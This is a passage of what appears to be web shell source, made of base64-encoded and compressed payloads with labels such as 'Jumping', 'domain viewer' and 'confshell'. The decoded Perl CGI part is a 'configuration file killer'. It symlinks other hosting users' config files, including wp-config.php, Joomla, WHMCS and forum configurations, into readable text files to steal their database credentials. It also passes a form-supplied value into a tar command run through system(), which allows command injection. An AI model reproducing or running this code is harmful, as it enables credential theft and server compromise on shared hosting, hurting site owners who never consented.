Q0KOmhvdmVyI2NoZWNrb3V0dGV4dGFyZWEge29wYWNpdHk6IDAuNjsgYmFja2dyb3VuZC1jb2xvcjozMzMzMzN9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQooJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1vcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xhLictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLictMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJy01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLictNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXdwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dQL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1XUC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13b3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1ibG9nLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZ3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLXdwLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtcHJvdGFsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1tYWluLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Rlc3Qvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC10ZXN0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJy02LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywka29sYS4nLTcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29ubmVjdC5waHAnLCRrb2xhLictOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJy05LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGtvbGEuJy0xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb28vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtY21zLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12YjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy1pbmNsdWRlcy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htMTUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2VudHJhbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tV0hNQ1MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htYy9XSE0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHAvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLXdobS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJy13aG1jczIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50ZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50c3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLW1hbmFnZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXkudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobS1teXNob3AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXplbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC16ZW5jYXJ0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc21mL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYtZm9ydW0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYtZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdXAyLnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQpyZWFkKFNURElOLCAkYnVmZmVyLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCn0gZWxzZSB7DQokYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQooJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiRuYW1lID1+IHRyLysvIC87DQokbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KJHZhbHVlID1+IHRyLysvIC87DQokdmFsdWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0iZHoiIGJnY29sb3I9ImJsYWNrIj4NCjxwPjxmb250IGNvbG9yPXdoaXRlPmNvbmZpZ3VyYXRpb24gZmlsZSBraWxsZXI8L3A+DQoNCjxzcGFuPjxmb250IGNvbG9yPSJ3aGl0ZSI+c3VwcGx5IHVzZXJuYW1lcyB0byBzeW1saW5rIGNvbmZpZ3VyYXRpb24gZmlsZXM8L2ZvbnQ+PC9zcGFuPjxiciAvPg0KPGJyIC8+PGZvcm0gbWV0aG9kPSJwb3N0Ij48c3Ryb25nPg0KPHRleHRhcmVhIGlkPSJjaGVja291dHRleHRhcmVhIiBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjJweCBkYXNoZWQgcmVkOyB3aWR0aDogMzAwcHg7IGhlaWdodDogMjAwcHg7IGJhY2tncm91bmQtY29sb3I6YmxhY2s7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjlwdDsgY29sb3I6IHJlZCIgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDsNCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9InNwaW4gaXQgOC0pIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwRkZGRjsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjogYmxhY2s7IHRleHQtdHJhbnNmb3JtOnVwcGVyY2FzZTsgaGVpZ2h0OjIzOyBiYWNrZ3JvdW5kLWNvbG9yOiNGNEY0RjQ7IiAvPjwvcD4NCjwvZm9ybT48L3N0cm9uZz4NCic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KfQ0KcHJpbnQnPGJvZHkgY2xhc3M9ImR6IiBiZ2NvbG9yPSJibGFjayI+DQo8aDI+ZG9uZSA8L2gyPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3NlKElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0uJy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPjwvc3Bhbj48L2ZvbnQ+PC9hPjwvcD4nOw0KfQ0KfQ0KcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+";
494//Jumping
495$jumper="zVPdbtMwFL6ftHc4tSLZ0dKmwF2bpEgILkFar2CbghPbxCiJI9thK9MeiLfkOFnLygXXKErkfj/n15V1Y4BknlethLrlzuW3pO5EZR5uSZF5i6+A2rRu4D1SrxElW7i8YJHrIAfd6/Kb9Iw6rmTZGSFpDHkO6xh2qJpF1ChFNyC0ZOS9tcZuYH+UI/2pz1IvCvzY8AmlFJcXmdA/ThXpXhnMvB8t7/bNm7bNUqQL+Ev2nR84yuCL6Sotl9fGePgFZCW4l4x+ponXnWRxvCIIRg8feSfxuF3GMMcjcWjNSV8GYdnqTnu2RvBtNGCGe4HVKjPIntFU+jqdQZpQSyenVsAWz9IYHkPHwMjN8g6mtmED78wo+q8eriUX8CLG/zSBp7C4YaywWW4tPzDEotFJ686Q2vTqDND4a72F+0a3ki2UNIodZxE/TpfB2zBAvC/uxGwhDA29Bbxar1EXDSbkQS0eWPAkdDOPdyqix5IDP1ZIzfw6CaZQgtD2Z7hwaWM6mdLVybGiKXbU6rpsfNem9Lgt9ifmAn00VBpw7UqLKwqbYFPUQEytlsPomtnmkpMbk79kMVcy28I4wxPpq6twVgbj1g08RwDu5tlOE5Lh30hvPpixF7C4g4xDY6XKye6Qn7V03g4p/kGmWcqLrLIFnTe7K34D";
496//domain viewer
497$private="y8kvS1WozC9VCE7MKc5IVLDSAgA=";
498$zonekerupuk="rVVtb9s2EP5uwP/hqgWRDTiWnWRrIcvChjUFhmZJYbtfNhcGLZ8sIhQpUFRtt8h/31EvsfPidgVKwBB5R94999xDGqNEOe1WkJudwLDdMrg1TCODr+2Wxpx/QV8qiaN2K1JCaR9+GZQDyLJk0d1aq0Kuzipn7RsBtFuxkuasPP8mMyOoN8TlsGeVXqH2h9kWciX4CjYJNwgPnjOBsfHh8rl/w1cm8X+9vMi2tEqQrxPjXw4G5fK+3eIyK4yF/xjwT8F7HNXxeghS4DX0BhFKgzoMYqVTSNEkajWeOx9up7O5Q/6/udZKg287ggIjA+XJsfukmKOlfLOMbxdxrITaXhutu3S4IFmKBD4tMZfwA5UZrmT4hSRzlgRevSwZKMsJg6Wm5Y0yPEYNNxTBh6BqmdllNpxV4NyBTLAIEyUoNRnfoy6y4o7sddIVxuSnrGCLJcPFOSGoor9VKeMyB98ugwdFV0zOnUpA8NvrNyQZqAUEF4NzWh4kqILYoF4Too7/GG9eLFNuEX9morCGKcrVPs5aVcx4tuN2YjHRzyFpkOxyNAvDU1wITlGgM+iSncfQeRUXMrLsLXDLc5NDx4kKLRZccuN0u19XHMk0S3gO00jzzECRYw7Rx8k1XPOlZnrXg50qIC1yA1SJYUJAzDWtXpUgGCQa47GbGJP5nseK836WZH2JxkuZLJjwUHo2Z59AFpl1uuEPbA48Fjrd0X1Zpy3p95OFFfq/7lq5n7rtFt1RqAeRgyxKoIPbTKiVLW0unR40J+pu0DFgOZxUy+7+/EGoZmSKKu3UWw8iVcJxP+1NlYAp9mgf5X4/RXoiwWn6RrSRFtZoxu5iKZi8cx/TWEm/H6nUYzpK+Gf0smIpeJ7gajxww3/qq8EeVFAR1LS7wU1UEsIaLc0qkI9ZOyHGxvAgC+gcVlCaqRl0BylclPTgT9LG7YfZYnI1+zi5mU3+uJm+u5r0YPj/jlmyms37/fmGG9u4PcAXehKxHMGpqHFGz3t1PCl9euDU3G42m/4Bv9K+Ijsv53It0On+UFxbzLu/rq7fTil8zfK4ofu0Es1wbLtwmtBbm5Imx8NTEmmu5Hj4YjIr8UzjepGykhHHK19fegM00oMQ3r4P5p59n0P6Ch56pO8SIG4xKuF1u93nYZ/IsL61Tt+x4OjTyJGmlSBpEgZ5xuST/461RpRuaI8BYfHslvBQiM8yihy/i+eFRFRunebKSqLJdCTLkki9O7DbHhTC+N/fef9EtZFQJLOSSHut/gM=";
499//confshell
500$configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHA